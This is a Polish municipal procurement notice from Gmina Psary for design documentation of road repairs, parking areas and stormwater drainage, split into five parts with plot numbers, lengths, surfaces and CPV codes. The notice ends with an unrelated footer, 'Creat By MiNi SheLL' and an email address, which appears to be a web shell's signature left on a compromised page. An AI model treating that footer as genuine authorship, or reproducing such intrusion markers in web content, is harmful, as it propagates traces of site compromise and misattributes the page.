<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.08.2015 godzina 10:00, miejsce: Urząd Gminy w Psarach ul. Malinowicka 4, 42-512 Psary, kancelaria ogólna - parter budynku.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Opracowanie kompletnych projektów budowlano - wykonawczych budowy i remontu nawierzchni dróg gminnych wraz z odwodnieniem, na terenie Gminy Psary z uzyskaniem ostatecznej decyzji pozwolenia na budowę/lub braku sprzeciwu rozpoczęcia zgłoszonych robót i sprawowaniem nadzoru autorskiego. Zadanie Nr 1: siedem  Projektów budowlano - wykonawczych  remontu nawierzchni dróg gminnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> siedem projektów budowlano - wykonawczych tj.: 
I .Góra Siewierska - remont odcinka drogi gminnej ul.1-go Maja, dz. nr 276.
Przedmiotem zamówienia jest projekt remontu odcinka drogi gminnej ul.1-Maja
618 032 S usytuowanej na działce nr 276.Długość opracowania 32,0m, klasy D
o szerokości 4,0m o nawierzchni z asfaltobetonu i utwardzonymi poboczami o szerokości 2x0,25m.
II.  Psary ul. Kamienna (boczna dz. nr 676) 
Przedmiotem zamówienia jest projekt chodnika pieszo-jezdnego na działce nr 676
w Psarach stanowiący odnogę ulicy Kamiennej służący jako ciąg komunikacyjny
łączący tereny zabudowy jednorodzinnej z gminną drogą publiczną ul. Kamienną.
Projekt obejmowałby teren użytku drogowego o długości 84,00m i sr. szerokości 3,00m o nawierzchni z kostki betonowej gr.8cm.
III. Sarnów ul. Nowa.(dz. nr 888)
Przedmiotem zamówienia jest projekt drogi gminnej ul. Nowej w Sarnowie o długości
432m i szerokości jezdni 3,50m o nawierzchni z destruktu.
IV. Malinowice ul. Bukowa
Przedmiotem zamówienia jest projekt drogowy odcinka  ul. Bukowej w Malinowicach stanowiący kontynuację remontu nawierzchni drogi gminnej ul. Belnej
w Strzyżowicach, której ostatni odcinek został zrealizowany w 2014r.
Zakres projektu obejmowałby odcinek o długości 409,0m o szerokości 3,50-4,00m
o nawierzchni z kostki betonowej gr.8cm.
V. Preczów ul. Zielona- II etap.
Przedmiotem zamówienia jest projekt drogowy ul. Zielonej w Preczowie stanowiący
ciąg dalszy wykonanej nawierzchni ul. Zielonej w 2014r. od ul. Jaworowej do końca
działki drogowej na której jest możliwość urządzenia drogi klasy D o szerokości jezdni do 3,30m i nawierzchni z kostki brukowej gr.8cm.
VI. Projekt budowlano wykonawczy dla budowy odwodnienia 
odcinka ul. Kolejowej w Gródkowie przy działce nr 54/3 poprzez wykonanie wpustu ulicznego z odprowadzeniem wód deszczowych do kanalizacji deszczowej odległej o około 45m.
VII. Projekt budowlano wykonawczy dla budowy miejsc postojowych  
 na działkach nr 2367/27 i 2367/29 w Psarach wzdłuż całej działki 2367/29 
Pozostałe szczegółowe założenia projektowe zawiera Załącznik Nr 8 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.32.20.00-1, 71.24.80.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 7.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Opracowanie kompletnych projektów budowlano - wykonawczych budowy i remontu nawierzchni dróg gminnych wraz z odwodnieniem, na terenie Gminy Psary z uzyskaniem ostatecznej decyzji pozwolenia na budowę/lub braku sprzeciwu rozpoczęcia zgłoszonych robót i sprawowaniem nadzoru autorskiego, Zadanie Nr 2: Projekt budowlano - wykonawczy remontu nawierzchni drogi gminnej z dobudową chodnika w Malinowicach ul. Brzozowa oraz Dąbiu Chrobakowym wraz z odwodnieniem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dąbie Chrobakowe- remont nawierzchni dróg gminnych:618 040 S-Malinowice ul. Brzozowa, 618 062 S-Dąbie Chrobakowe I, 615 062 S-Dąbie Chrobakowe II.
Przedmiotem zamówienia jest projekt remontu nawierzchni dróg gminnych usytuowanych na działkach drogowych o nr 634/2, 1289, 1400/1, 1383, 667/1, 
o łącznej długości  ok. 2727,0m.Remont ma polegać na wymianie nawierzchni jezdni z asfaltobetonu, wykonaniu chodnika od strony północnej krawędzi drogi, przebudowie zjazdów indywidualnych uregulowanie geometrii wraz z odtworzeniem poboczy i rowów oraz wymianie lub wzmocnienia podbudowy w miejscach koniecznych. Pozostałe szczegółowe założenia projektowe zawiera Załącznik Nr 8a do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.32.20.00-1, 71.24.80.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Opracowanie kompletnych projektów budowlano - wykonawczych budowy i remontu nawierzchni dróg gminnych wraz z odwodnieniem, na terenie Gminy Psary z uzyskaniem ostatecznej decyzji pozwolenia na budowę/lub braku sprzeciwu rozpoczęcia zgłoszonych robót i sprawowaniem nadzoru autorskiego. Zadanie Nr 3: siedem - Projektów budowlano - wykonawczych remontu nawierzchni dróg gminnych wraz z odwodnieniem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> siedem projektów budowlano - wykonawczych tj.: I. Sarnów- odwodnienie odcinka drogi gminnej ul. Podgórnej.
Przedmiotem zamówienia jest projekt odwodnienia części ul. Podgórnej w Sarnowie
i odprowadzenie wód poprzez tereny prywatne i Agencji Nieruchomości Rolnych
z  siedzibą w Opolu do cieku wodnego znajdującego się na działce nr 363/16.
Długość odcinka drogowego z którego ma być odprowadzona woda opadowa:180m.
Długość kanalizacji krytej odprowadzającej wodę opadową do cieku wodnego:265m.
Przebudowa odcinka ul. Górnej polega na wybudowaniu w  południowej krawędzi jezdni krawężnika drogowego oraz zaprojektowaniu przy nim  ścieku z dwóch rzędów kostki bez zmian w niwelecie i spadku poprzecznym jezdni   z uwzględnieniem co najmniej dwóch wpustów ulicznych typu ciężkiego.
II. Odwodnienie ulicy Górnej oraz rejonu skrzyżowania z ul. Wiejską
Lokalizacja :
Gmina Psary  - ul. Górna od ul. Wiejskiej do końca posesji oraz skrzyżowanie ul. Górnej z ul. Wiejską.
W stanie obecnym ul .Górna posiada nawierzchnię z betonu asfaltowego z obustronnymi poboczami gruntowymi .Stan techniczny jest zły , występują deformacje podłużne i poprzeczne. Brak chodników.
Odwodnienie powierzchniowe częściowo za pomocą istniejących rowów otwartych i częściowo w teren przyległy do pasa drogowego.
W rejonie skrzyżowania ul. Górnej z ul. Wiejską istnieje system kanalizacji deszczowej z odprowadzeniem do rowu wzdłuż posesji Wiejska 214. Istniejącą nawierzchnię jezdni ul. Górnej należy wyremontować poprzez frezowanie , wzmocnienie geosyntetykiem i ułożenie nowej nawierzchni z mieszanki mineralno - bitumicznej ( zakładając odpowiednie nowe ukształtowanie niwelety zapewniające właściwe odwodnienie z wód opadowych nawierzchni jezdni)
III. : Projekt remontu nawierzchni jezdni wraz z odwodnieniem drogi gminnej ul. Kościelnej  w Dąbiu wraz z projektem drogi do Pana Buchacza. 1.Przewiduje się wykonanie nowej konstrukcji odcinka jak wyżej , nowa nawierzchnia z betonu asfaltowego. Przekrój uliczny .Odwodnienia wód powierzchniowo , odbiornikiem wód rowy wzdłuż ul.Kościelnej które wymagają odcinkami odtworzenia na odcinku zapewniającym spływ wód deszczowych wraz z niwelacją poboczy .W miarę potrzeby należy uwzględnić przebudowę przepustów pod istniejącymi zjazdami do posesji.
Odcinek ul.Kościelnej z istn.nawierzchnią asfaltową przewiduje się odcinkowo wyremontować poprzez frezowanie i ułożenie nowej nawierzchni asfaltowej z krawężnikami.
Uwaga- wykonawca dokumentacji winien,  przed złożeniem oferty na prace projektowe po dokonanej wizji w terenie , zapoznać się z możliwościami odwodnienia z wód opadowych i na tej podstawie uwzględnić do wykonania niezbędne opracowania projektowe wraz  z dokonaniem wszelkich niezbędnych uzgodnień.
IV.  Projekt parkingu przy cmentarzu wraz z alejkami na cmentarzu
Lokalizacja :
Gmina Psary  - Strzyżowice -ul.Szosowa - alejki cmentarne wraz z terenem przyległym do cmentarza.W stanie obecnym na terenie cmentarza istnieją alejki nieutwardzone , teren przeznaczony pod parking do plac utwardzony żużlem bez uporządkowanego odwodnienia z wód opadowych. 1.Przewiduje się wykonanie utwardzenia istniejących alejek cmentarnych poprzez wykonanie nawierzchni z kostki betonowej gr. 6 cm .Szerokości alejek w zależności od lokalizacji. Przebieg alejek po śladzie istniejącym.Odwodnienie powierzchniowo.
Parking dla samochodów osobowych o nawierzchni z kształtek betonowych gr. 8 cm.
Wjazd na parking od ul.Szosowej ( dr.wojewódzka nr 913).
Odwodnienie z wód opadowych poprzez system kanalizacji - odprowadzenie do rowu przy drodze wojewódzkiej z uwzględnieniem urządzeń ochrony środowiska ( po uzyskaniu od Zarządcy Drogi zgody na zrzut do rowu wód deszczowych ) lub odprowadzenie do studni chłonnych.
Uwaga- wykonawca dokumentacji winien,  przed złożeniem oferty na prace projektowe po dokonanej wizji w terenie , zapoznać się z możliwościami odwodnienia z wód opadowych i na tej podstawie uwzględnić do wykonania niezbędne opracowania projektowe wraz  z dokonaniem wszelkich niezbędnych uzgodnień.
V.  Brzękowice Wał- remont nawierzchni drogi gminnej 618 063 S.
Przedmiotem zamówienia jest projekt remontu nawierzchni jezdni drogi gminnej
nr 618 063 S usytuowanej na działkach o nr 361, 416/1, 222 tj. od drogi powiatowej
S 4783 ul.Pocztowej w Brzękowicach Dolnych do końca zabudowań Brzękowice Wał w kierunku osiedla Czerwony Kamień w Górze Siewierskiej na długości 1248,3m.
VI. Psary-parking naprzeciwko kościoła przy ul.  Zwycięstwa dz. nr 321.
Przedmiotem zamówienia jest projekt remontu parkingu na działce nr 321 przy ul. Zwycięstwa w Psarach. Powierzchnia opracowania to ok.800m2 wraz z remontem nawierzchni zjazdów z ul. Zwycięstwa. Parking o nawierzchni z kostki betonowej wraz z odwodnieniem.
VII. Projekt odwodnienia ulicy Ogrodowej i wraz z odwodnieniem oczka wodnego zaprojektowanego na terenie OSP w Górze Siewierskiej
Lokalizacja : Gmina Psary  - Góra Siewierska - ul.Ogrodowa od ul.Kościuszki do posesji Ochotniczej Straży Pożarnej. W stanie obecnym ul.Ogrodowa  posiada nawierzchnię z betonu asfaltowego z obustronnymi poboczami gruntowymi .Stan techniczny jest zły , występują deformacje podłużne i poprzeczne. Brak chodników.
Odwodnienie powierzchniowe , odprowadzenie wód po części do istniejącej sieci kanalizacyjnej w ul.Kościuszki. W rejonie skrzyżowania ul.Kościuszki i ul.Ogrodowej istnieje kanalizacja deszczowa , która będzie odbiornikiem kanalizacji projektowanej.
Pozostałe szczegółowe założenia projektowe zawiera Załącznik Nr 8b do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.32.20.00-1, 71.24.80.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Opracowanie kompletnych projektów budowlano - wykonawczych budowy i remontu nawierzchni dróg gminnych wraz z odwodnieniem, na terenie Gminy Psary z uzyskaniem ostatecznej decyzji pozwolenia na budowę/lub braku sprzeciwu rozpoczęcia zgłoszonych robót i sprawowaniem nadzoru autorskiego. Zadanie Nr 4:  Projekt budowlano - wykonawczy odwodnienia rejonu skrzyżowania ul. Rogoźnickiej z ul. Podwale oraz remont nawierzchni  ul. Podwale.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przebudowę jezdni ul. Podwale należy przewidzieć na odcinku istniejącym z nawierzchnią klinkierową po śladzie istniejącym. Nowa nawierzchnia z betonu asfaltowego dla parametrów jak wyżej i konstrukcja uzależniona od badań geotechnicznych podłoża. Na pozostałym odcinku ul. Podwale przewidzieć remont istn. nawierzchni asfaltowej. W ramach przebudowy należy uwzględnić przebudowę zjazdów do posesji w granicach pasa drogowego. Przekrój uliczny lub półuliczny w zależności od rozwiązania odwodnienia z wód opadowych.2. Odwodnienie ul. Podwale oraz skrzyżowania ul. Podwale z ul. Rogoźnicką powierzchniowo z ewentualnym uwzględnieniem budowy odcinka kanalizacji deszczowej wraz z ewentualnym uwzględnieniem urządzeń ochrony środowiska.
Odbiornikiem wód opadowych po części istniejący przepust pod ul. Podwale oraz po części rów otwarty przy ul. Rogoźnickiej (droga powiatowa). Pozostałe szczegółowe założenia projektowe zawiera Załącznik Nr 8c do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.32.20.00-1, 71.24.80.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Opracowanie kompletnych projektów budowlano - wykonawczych budowy i remontu nawierzchni dróg gminnych wraz z odwodnieniem, na terenie Gminy Psary z uzyskaniem ostatecznej decyzji pozwolenia na budowę/lub braku sprzeciwu rozpoczęcia zgłoszonych robót i sprawowaniem nadzoru autorskiego. Zadanie Nr 5: Projekt budowlano - wykonawczy przebudowy drogi gminnej ul. Wspólnej wraz z odwodnieniem w Psarach /Gródkowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Gródków/Psary-remont drogi gminnej ulicy Wspólnej dz. nr 519/1.
1. Przedmiotem zamówienia jest projekt drogi gminnej 618 005 S usytuowanej na działce nr 519/1 na granicy sołectw Psary i Gródków.Długość opracowania:775,0m.
Z uwagi na małą szerokość działki zakłada się uzyskanie pozwolenia na budowę
na podstawie ZRID-u.W ramach projektu należy przewidzieć:rozpoznanie nośności podłoża poprzez odwierty geologiczne na głębokość min. 2,0m, wykonanie nowej podbudowy oraz nowej nawierzchni z kostki betonowej gr.8cm nawiązując do już
zrealizowanego odcinka. Z uwagi na długośc odcinka drogowego oraz uwzględniając
parametry drogi oraz ukształtowanie terenu należy przewidzieć mijanki. Odprowadzenie wód powierzchniowych należy przewidzieć spadkami podłużnymi i poprzecznymi oraz do cieków wodnych połączonego z opracowaniem operatu wodno-prawnego.
Teren jest uzbrojony w sieć wodociągową, gazową, energetyczną i teletechniczną.
Z uwagi na konieczność zmiany parametrów obecnej drogi postępowanie należy przeprowadzić ZRID-em, przewidując koszty podziału nieruchomości oraz ich wykupu. Uwzględnić wszelkie kolizje: z drzewami, słupami trakcji napowietrznej oraz podziemną infrastrukturą techniczną. Pozostałe szczegółowe założenia projektowe zawiera Załącznik Nr 8d do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.32.20.00-1, 71.24.80.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 8.</li></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com